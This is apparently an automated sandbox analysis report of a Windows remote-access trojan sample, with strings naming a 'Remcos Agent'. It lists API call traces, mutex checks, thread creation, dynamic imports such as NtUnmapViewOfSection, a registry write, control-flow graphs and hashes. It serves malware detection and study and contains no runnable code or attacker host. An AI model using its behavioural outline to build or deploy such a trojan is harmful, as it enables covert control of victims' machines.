                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                                          • API String ID: 551388010-2474455403
                                                                                          • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                          • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                                          • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                          • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                                                                                          Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 473 4407b5-4407c1 call 4461f8 476 4407e3-4407ef call 44083a ExitProcess 473->476 477 4407c3-4407d1 GetPEB 473->477 477->476 478 4407d3-4407dd GetCurrentProcess TerminateProcess 477->478 478->476
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                                                                          • ExitProcess.KERNEL32 ref: 004407EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                          • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                                                                          • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                          • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                                                                          Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 81 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->81 82 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->82 90 40d991-40d99a call 401fb8 81->90 91 40d67f-40d686 81->91 98 40d622-40d63f call 401f8b call 411f34 82->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 82->99 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->109 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 107 40d6b0-40d6b4 95->107 108 40d6a9-40d6ab 95->108 123 40d651 98->123 124 40d641-40d650 call 401f8b call 41239a 98->124 99->98 133 40dd2c 105->133 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 138 40d6cb-40d6d1 113->138 140 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->140 141 40d72c call 40e501 114->141 123->81 124->123 139 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 133->139 138->114 144 40d6d3-40d6d9 138->144 189 40dd6a-40dd6f call 413980 139->189 217 40d815-40d819 140->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 140->218 141->140 151 40d6f7-40d710 call 401f8b call 411eea 144->151 152 40d6db-40d6ee call 4060ea 144->152 151->114 178 40d712 call 4066a6 151->178 152->114 166 40d6f0-40d6f5 call 4067a0 152->166 166->114 220 40da61-40da63 175->220 221 40da65-40da67 175->221 178->114 217->109 219 40d81f-40d826 217->219 218->217 249 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 218->249 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 237 40d8b6-40d8de call 40245c call 43254d 223->237 224->237 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 237->255 256 40d8e0-40d8ee call 434c30 237->256 249->217 262 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 255->262 256->262 262->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 262->332 332->175 346 40d98e-40d990 332->346 346->90 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 384 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->384 385 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->385 373->372 384->385 404 40dcc1 385->404 405 40dcc4-40dcd7 CreateThread 385->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->133 416 40dd03-40dd06 412->416 413->412 416->189 418 40dd08-40dd0d 416->418 418->139
                                                                                          APIs
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                                            • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                                          • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                                          • API String ID: 1529173511-1365410817
                                                                                          • Opcode ID: 41e97e648275280d3dddb753ada466f004951c110e7e909b6851935f8b62d148
                                                                                          • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                                          • Opcode Fuzzy Hash: 41e97e648275280d3dddb753ada466f004951c110e7e909b6851935f8b62d148
                                                                                          • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                                                                                          Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                                                          • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                                                                          • closesocket.WS2_32(?), ref: 00404E3A
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 3658366068-0
                                                                                          • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                                                                          • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                                          • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                                                                          • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                                                                          Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 437 4457a9-4457c0 GetLastError 438 4457c2-4457cc call 445ceb 437->438 439 4457ce-4457d5 call 443005 437->439 438->439 444 44581f-445826 SetLastError 438->444 443 4457da-4457e0 439->443 445 4457e2 443->445 446 4457eb-4457f9 call 445d41 443->446 448 445828-44582d 444->448 449 4457e3-4457e9 call 443c92 445->449 453 4457fe-445814 call 445597 call 443c92 446->453 454 4457fb-4457fc 446->454 455 445816-44581d SetLastError 449->455 453->444 453->455 454->449 455->448
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                                                                          • _free.LIBCMT ref: 004457E3
                                                                                          • _free.LIBCMT ref: 0044580A
                                                                                          • SetLastError.KERNEL32(00000000), ref: 00445817
                                                                                          • SetLastError.KERNEL32(00000000), ref: 00445820
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                          • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                                                                          • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                          • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                                                                          Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 460 445a95-445aa9 461 445ab6-445ad1 LoadLibraryExW 460->461 462 445aab-445ab4 460->462 464 445ad3-445adc GetLastError 461->464 465 445afa-445b00 461->465 463 445b0d-445b0f 462->463 466 445ade-445ae9 LoadLibraryExW 464->466 467 445aeb 464->467 468 445b02-445b03 FreeLibrary 465->468 469 445b09 465->469 470 445aed-445aef 466->470 467->470 468->469 471 445b0b-445b0c 469->471 470->465 472 445af1-445af8 470->472 471->463 472->471
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                                          • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                          • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                                                                          • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                          • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                                                                          Function 004459F9 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 481 4459f9-445a23 482 445a25-445a27 481->482 483 445a8e 481->483 484 445a2d-445a33 482->484 485 445a29-445a2b 482->485 486 445a90-445a94 483->486 487 445a35-445a37 call 445a95 484->487 488 445a4f 484->488 485->486 493 445a3c-445a3f 487->493 489 445a51-445a53 488->489 491 445a55-445a63 GetProcAddress 489->491 492 445a7e-445a8c 489->492 494 445a65-445a6e call 432123 491->494 495 445a78 491->495 492->483 496 445a70-445a76 493->496 497 445a41-445a47 493->497 494->485 495->492 496->489 497->487 498 445a49 497->498 498->488
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                          • String ID:
                                                                                          • API String ID: 2279764990-0
                                                                                          • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                                                                          • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                                                                                          • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                                                                          • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9
                                                                                          Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 501 40163e-401644 502 401646-401648 501->502 503 401649-401654 501->503 504 401656 503->504 505 40165b-401665 503->505 504->505 506 401667-40166d 505->506 507 401688-401689 call 43229f 505->507 506->507 508 40166f-401674 506->508 511 40168e-40168f 507->511 508->504 510 401676-401686 call 43229f 508->510 513 401691-401693 510->513 511->513
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                          • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                                                                          • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                          • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                                                                          Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 515 443005-443010 516 443012-44301c 515->516 517 44301e-443024 515->517 516->517 518 443052-44305d call 43ad91 516->518 519 443026-443027 517->519 520 44303d-44304e RtlAllocateHeap 517->520 525 44305f-443061 518->525 519->520 521 443050 520->521 522 443029-443030 call 442a57 520->522 521->525 522->518 528 443032-44303b call 440480 522->528 528->518 528->520
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                          • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                                                                          • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                          • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                                                                                          Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 531 443649-443655 532 443687-443692 call 43ad91 531->532 533 443657-443659 531->533 540 443694-443696 532->540 534 443672-443683 RtlAllocateHeap 533->534 535 44365b-44365c 533->535 537 443685 534->537 538 44365e-443665 call 442a57 534->538 535->534 537->540 538->532 543 443667-443670 call 440480 538->543 543->532 543->534
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                          • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                                                                          • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                          • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                                                                                          Non-executed Functions

                                                                                          Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                                            • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                                            • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
